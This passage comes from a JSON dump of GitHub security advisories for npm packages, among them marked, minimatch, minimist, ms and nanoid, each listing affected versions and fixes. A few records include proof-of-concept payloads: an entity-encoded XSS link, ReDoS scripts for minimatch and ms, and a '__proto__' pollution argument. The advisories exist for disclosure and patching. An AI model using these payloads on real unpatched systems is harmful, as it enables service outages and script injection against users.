"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfvf-mqq8-rwqc", "published": "2019-02-18T23:58:20Z", "modified": "2023-11-08T03:58:10.903030Z", "aliases": [ "CVE-2016-10531" ], "summary": "Sanitization bypass using HTML Entities in marked", "details": "Affected versions of `marked` are susceptible to a cross-site scripting vulnerability in link components when `sanitize:true` is configured. \n\n## Proof of Concept\n\nThis flaw exists because link URIs containing HTML entities get processed in an abnormal manner. Any HTML Entities get parsed on a best-effort basis and included in the resulting link, while if that parsing fails that character is omitted.\n\nFor example:\n\nA link URI such as\n```\njavascript\u0026#x58document;alert\u0026#40;1\u0026#41;\n```\nRenders a valid link that when clicked will execute `alert(1)`.\n\n\n## Recommendation\n\nUpdate to version 0.3.6 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-vfvf-mqq8-rwqc/GHSA-vfvf-mqq8-rwqc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10531" }, { "type": "WEB", "url": "https://github.com/chjj/marked/pull/592" }, { "type": "WEB", "url": "https://github.com/chjj/marked/pull/592/commits/2cff85979be8e7a026a9aca35542c470cf5da523" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vfvf-mqq8-rwqc" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/101" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:57:38Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x5pg-88wf-qq4p", "published": "2018-07-24T20:10:52Z", "modified": "2023-11-08T03:59:05.647192Z", "aliases": [ "CVE-2017-16114" ], "summary": "Regular Expression Denial of Service in marked", "details": "Affected versions of `marked` are vulnerable to a regular expression denial of service. \n\nThe amplification in this vulnerability is significant, with 1,000 characters resulting in the event loop being blocked for around 6 seconds.\n\n\n## Recommendation\n\nUpdate to version 0.3.9 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-x5pg-88wf-qq4p/GHSA-x5pg-88wf-qq4p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16114" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/937" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x5pg-88wf-qq4p" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/531" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:02:12Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xf5p-87ch-gxw2", "published": "2019-06-05T14:10:03Z", "modified": "2022-08-02T17:43:57Z", "summary": "Marked ReDoS due to email addresses being evaluated in quadratic time", "details": "Versions of `marked` from 0.3.14 until 0.6.2 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion.\n\n\n## Recommendation\n\nUpgrade to version 0.6.2 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.3.14" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-xf5p-87ch-gxw2/GHSA-xf5p-87ch-gxw2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1460" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/b15e42b67cec9ded8505e9d68bb8741ad7a9590d" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/releases/tag/v0.6.2" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-MARKED-174116" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/812" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T13:50:35Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4xcv-9jjx-gfj3", "published": "2019-07-05T21:07:58Z", "modified": "2021-08-17T15:44:45Z", "summary": "Denial of Service in mem", "details": "Versions of `mem` prior to 4.0.0 are vulnerable to Denial of Service (DoS). The package fails to remove old values from the cache even after a value passes its `maxAge` property. This may allow attackers to exhaust the system's memory if they are able to abuse the application logging.\n\n\n## Recommendation\n\nUpgrade to version 4.0.0 or later.", "affected": [ { "package": { "name": "mem", "ecosystem": "npm", "purl": "pkg:npm/mem" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-4xcv-9jjx-gfj3/GHSA-4xcv-9jjx-gfj3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/sindresorhus/mem/commit/da4e4398cb27b602de3bd55f746efa9b4a31702b" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1623744" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:mem:20180117" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1084" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-07-03T20:52:42Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-952p-6rrq-rcjv", "published": "2024-05-14T18:30:54Z", "modified": "2024-08-28T13:12:26Z", "aliases": [ "CVE-2024-4067" ], "related": [ "CGA-6q83-777j-gp5r", "CGA-7j2f-jxvw-gx52", "CGA-9hv5-rmvp-37vw", "CGA-9qj8-ph43-6pq5" ], "summary": "Regular Expression Denial of Service (ReDoS) in micromatch", "details": "The NPM package `micromatch` prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.\n", "affected": [ { "package": { "name": "micromatch", "ecosystem": "npm", "purl": "pkg:npm/micromatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-952p-6rrq-rcjv/GHSA-952p-6rrq-rcjv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4067" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/issues/243" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/pull/247" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/pull/266" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/commit/500d5d6f42f0e8dfa1cb5464c6cb420b1b6aaaa0" }, { "type": "WEB", "url": "https://advisory.checkmarx.net/advisory/CVE-2024-4067" }, { "type": "WEB", "url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4067" }, { "type": "PACKAGE", "url": "https://github.com/micromatch/micromatch" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/releases/tag/4.0.8" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-08-21T22:58:52Z", "nvd_published_at": "2024-05-14T15:42:47Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wrvr-8mpx-r7pp", "published": "2018-07-20T16:20:52Z", "modified": "2023-11-08T03:59:07.102650Z", "aliases": [ "CVE-2017-16138" ], "summary": "mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input", "details": "Affected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.\n\n\n## Recommendation\n\nUpdate to version 2.0.3 or later.", "affected": [ { "package": { "name": "mime", "ecosystem": "npm", "purl": "pkg:npm/mime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wrvr-8mpx-r7pp/GHSA-wrvr-8mpx-r7pp.json" } }, { "package": { "name": "mime", "ecosystem": "npm", "purl": "pkg:npm/mime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wrvr-8mpx-r7pp/GHSA-wrvr-8mpx-r7pp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16138" }, { "type": "WEB", "url": "https://github.com/broofa/node-mime/issues/167" }, { "type": "WEB", "url": "https://github.com/broofa/mime/commit/1df903fdeb9ae7eaa048795b8d580ce2c98f40b0" }, { "type": "WEB", "url": "https://github.com/broofa/mime/commit/855d0c4b8b22e4a80b9401a81f2872058eae274d" }, { "type": "PACKAGE", "url": "https://github.com/broofa/mime" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:01:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f8q6-p94x-37v3", "published": "2022-10-18T12:00:32Z", "modified": "2024-02-14T18:15:16Z", "aliases": [ "CVE-2022-3517" ], "summary": "minimatch ReDoS vulnerability", "details": "A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.", "affected": [ { "package": { "name": "minimatch", "ecosystem": "npm", "purl": "pkg:npm/minimatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-f8q6-p94x-37v3/GHSA-f8q6-p94x-37v3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3517" }, { "type": "WEB", "url": "https://github.com/grafana/grafana-image-renderer/issues/329" }, { "type": "WEB", "url": "https://github.com/nodejs/node/issues/42510" }, { "type": "WEB", "url": "https://github.com/isaacs/minimatch/commit/a8763f4388e51956be62dc6025cec1126beeb5e6" }, { "type": "PACKAGE", "url": "https://github.com/isaacs/minimatch" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTEUUTNIEBHGKUKKLNUZSV7IEP6IP3Q3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UM6XJ73Q3NAM5KSGCOKJ2ZIA6GUWUJLK" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-10-20T18:21:03Z", "nvd_published_at": "2022-10-17T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hxm2-r34f-qmc5", "published": "2018-10-09T00:40:41Z", "modified": "2023-11-08T03:58:11.455886Z", "aliases": [ "CVE-2016-10540" ], "summary": "Regular Expression Denial of Service in minimatch", "details": "Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.\n\n\n## Proof of Concept\n```js\nvar minimatch = require(“minimatch”);\n\n// utility function for generating long strings\nvar genstr = function (len, chr) {\n var result = “”;\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n return result;\n}\n\nvar exploit = “[!” + genstr(1000000, “\\\\”) + “A”;\n\n// minimatch exploit.\nconsole.log(“starting minimatch”);\nminimatch(“foo”, exploit);\nconsole.log(“finishing minimatch”);\n```\n\n\n## Recommendation\n\nUpdate to version 3.0.2 or later.", "affected": [ { "package": { "name": "minimatch", "ecosystem": "npm", "purl": "pkg:npm/minimatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-hxm2-r34f-qmc5/GHSA-hxm2-r34f-qmc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10540" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-hxm2-r34f-qmc5" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/118" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:41:28Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vh95-rmgr-6w4m", "published": "2020-04-03T21:48:32Z", "modified": "2025-01-14T08:57:16.325412Z", "aliases": [ "CVE-2020-7598" ], "summary": "Prototype Pollution in minimist", "details": "Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application. \nThis is exploitable if attackers have control over the arguments being passed to `minimist`.\n\n\n## Recommendation\n\nUpgrade to versions 0.2.1, 1.2.3 or later.", "affected": [ { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-vh95-rmgr-6w4m/GHSA-vh95-rmgr-6w4m.json" } }, { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-vh95-rmgr-6w4m/GHSA-vh95-rmgr-6w4m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7598" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/10bd4cdf49d9686d48214be9d579a9cdfda37c68" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94" }, { "type": "PACKAGE", "url": "https://github.com/substack/minimist" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-MINIMIST-559764" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1179" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2020-04-03T21:42:08Z", "nvd_published_at": "2020-03-11T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xvch-5gv4-984h", "published": "2022-03-18T00:01:09Z", "modified": "2025-01-14T10:12:15.693708Z", "aliases": [ "CVE-2021-44906" ], "summary": "Prototype Pollution in minimist", "details": "Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file `index.js`, function `setKey()` (lines 69-95).", "affected": [ { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-xvch-5gv4-984h/GHSA-xvch-5gv4-984h.json" } }, { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-xvch-5gv4-984h/GHSA-xvch-5gv4-984h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44906" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/issues/11" }, { "type": "WEB", "url": "https://github.com/substack/minimist/issues/164" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/pull/24" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/34e20b8461118608703d6485326abbb8e35e1703" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/bc8ecee43875261f4f17eb20b1243d3ed15e70eb" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/c2b981977fa834b223b408cfb860f933c9811e4d" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/ef9153fc52b6cea0744b2239921c5dcae4697f11" }, { "type": "WEB", "url": "https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/minimist%20PoC.zip" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commits/v0.2.4" }, { "type": "PACKAGE", "url": "https://github.com/substack/minimist" }, { "type": "WEB", "url": "https://github.com/substack/minimist/blob/master/index.js#L69" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-MINIMIST-559764" }, { "type": "WEB", "url": "https://stackoverflow.com/questions/8588563/adding-custom-properties-to-a-function/20278068#20278068" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:13:40Z", "nvd_published_at": "2022-03-17T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3fx5-fwvr-xrjg", "published": "2017-10-24T18:33:36Z", "modified": "2024-08-01T16:44:35Z", "aliases": [ "CVE-2015-8315" ], "summary": "Regular Expression Denial of Service in ms", "details": "Versions of `ms` prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.\n\n## Proof of Concept\n```javascript\nvar ms = require('ms');\nvar genstr = function (len, chr) {\n var result = \"\";\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n\n return result;\n}\n\nms(genstr(process.argv[2], \"5\") + \" minutea\");\n\n```\n\n### Results\nShowing increase in execution time based on the input string.\n```\n$ time node ms.js 10000\n\nreal\t0m0.758s\nuser\t0m0.724s\nsys\t0m0.031s\n\n$ time node ms.js 20000\n\nreal\t0m2.580s\nuser\t0m2.494s\nsys\t0m0.047s\n\n$ time node ms.js 30000\n\nreal\t0m5.747s\nuser\t0m5.483s\nsys\t0m0.080s\n\n$ time node ms.js 80000\n\nreal\t0m41.022s\nuser\t0m38.894s\nsys\t0m0.529s\n```\n", "affected": [ { "package": { "name": "ms", "ecosystem": "npm", "purl": "pkg:npm/ms" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-3fx5-fwvr-xrjg/GHSA-3fx5-fwvr-xrjg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8315" }, { "type": "WEB", "url": "https://github.com/unshiftio/millisecond" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/46" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96389" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:55:05Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w9mr-4mfr-499f", "published": "2023-01-05T12:30:27Z", "modified": "2025-11-04T16:42:14Z", "aliases": [ "CVE-2017-20162" ], "summary": "Vercel ms Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability, which was classified as problematic, has been found in vercel ms up to 1.x. This issue affects the function parse of the file index.js. The manipulation of the argument str leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is caae2988ba2a37765d055c4eee63d383320ee662. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217451.", "affected": [ { "package": { "name": "ms", "ecosystem": "npm", "purl": "pkg:npm/ms" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-w9mr-4mfr-499f/GHSA-w9mr-4mfr-499f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20162" }, { "type": "WEB", "url": "https://github.com/vercel/ms/pull/89" }, { "type": "WEB", "url": "https://github.com/vercel/ms/commit/caae2988ba2a37765d055c4eee63d383320ee662" }, { "type": "PACKAGE", "url": "https://github.com/vercel/ms" }, { "type": "WEB", "url": "https://github.com/vercel/ms/releases/tag/2.0.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.217451" }, { "type": "WEB", "url": "https://vuldb.com/?id.217451" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-01-10T21:45:33Z", "nvd_published_at": "2023-01-05T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mwcw-c2x4-8c55", "published": "2024-12-09T03:30:59Z", "modified": "2025-11-04T16:54:54Z", "aliases": [ "CVE-2024-55565" ], "related": [ "CGA-7vvh-vj96-x4xv", "CGA-8vh7-wwpf-5f4g", "CGA-cr3m-qfmj-rhf8", "CGA-q99g-63m8-c4r8" ], "summary": "Predictable results in nanoid generation when given non-integer values", "details": "When nanoid is called with a fractional value, there were a number of undesirable effects:\n\n1. in browser and non-secure, the code infinite loops on while (size--)\n2. in node, the value of poolOffset becomes fractional, causing calls to nanoid to return zeroes until the pool is next filled\n3. if the first call in node is a fractional argument, the initial buffer allocation fails with an error\n\nVersion 3.3.8 and 5.0.9 are fixed.", "affected": [ { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "5.0.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-mwcw-c2x4-8c55/GHSA-mwcw-c2x4-8c55.json" } }, { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.3.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-mwcw-c2x4-8c55/GHSA-mwcw-c2x4-8c55.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55565" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/pull/510" }, { "type": "PACKAGE", "url": "https://github.com/ai/nanoid" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/compare/3.3.7...3.3.8" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/releases/tag/5.0.9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2024-12-09T22:42:43Z", "nvd_published_at": "2024-12-09T02:15:19Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qrpm-p2h7-hrv2", "published": "2022-01-21T23:57:06Z", "modified": "2025-11-04T16:35:00Z", "aliases": [ "CVE-2021-23566" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in nanoid", "details": "The package nanoid from 3.0.0, before 3.1.31, are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.", "affected": [ { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.31" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-qrpm-p2h7-hrv2/GHSA-qrpm-p2h7-hrv2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23566" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/pull/328" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575" }, { "type": "WEB", "url": "https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444" }, { "type": "PACKAGE", "url": "https://github.com/ai/nanoid" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2332550" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-NANOID-2332193" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-704" ], "github_reviewed": true, "github_reviewed_at": "2022-01-18T21:54:04Z", "nvd_published_at": "2022-01-14T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ff6r-5jwm-8292", "published": "2018-07-24T19:51:16Z", "modified": "2023-11-08T03:59:04.794346Z", "aliases": [ "CVE-2017-16099" 